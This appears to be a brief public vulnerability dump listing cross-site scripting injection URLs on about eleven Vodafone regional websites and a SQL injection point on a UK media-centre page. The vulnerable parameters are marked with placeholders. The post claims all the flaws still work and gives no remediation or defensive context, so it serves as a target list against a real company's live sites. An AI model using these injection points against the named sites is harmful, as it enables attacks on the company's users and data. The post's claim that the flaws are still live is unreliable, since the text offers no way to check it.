Vodafone.com, Vodafone.ro, Vodafone.com.tr, Vodafone.com.au, Vodafone.es, Vodafone.it, Vodafone.gr, Vodafone.ie, Vodafone.in, Vodafone.de, Vodafone.co.uk
Proof of concept:
https://www.vodafone.ro/mydomain/shop/voda.signup.cgi?pageid=print_moreinfo&id=XSS
http://runners.vodafone.com/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=XSS
https://wlan.net.vodafone.it/vfile/pwlan/pages/otp/login_partner.jsp?LoginURL=login.linkem.com/sd/login&AccessLocation=isocc=it,cc=39,ac=06,network=linkem&LogoffURL=x&LocationName=XSS
https://club2020.mi.vodafone.es/rascaygana/mailing/mail_alta.php?telefono_encriptado=XSS
http://handyfinder.vodafone.de/application_start.php?RTYPE=XSS
http://portal.vodafone.gr/vodafonenet/register/newRegister/holSSOlogin.jsp?action2=XSS
http://live.vodafone.com.tr/galleryimages/watch.php?url=http://live.vodafone.com.tr/galleryimages/rockncoke/videos/rnc_video_03.flv&keepThis=true&TB_iframe=true&height=XSS
http://vic.vodafone.com.au/coverage/qld.asp?detail=58XSS
http://www.vodafone.ie/search/Search.shtml?site=10_163_142_helpsupport&q=XSS
http://promo.in.vodafone.in/admin/index.php?Page=XSS
And SQL Injection on http://mediacentre.vodafone.co.uk
PoC:
http://mediacentre.vodafone.co.uk/news_view_doc.php?type=press&doc_id=SQL Injection
XSS also works!

All proofs of concept still work. Be careful!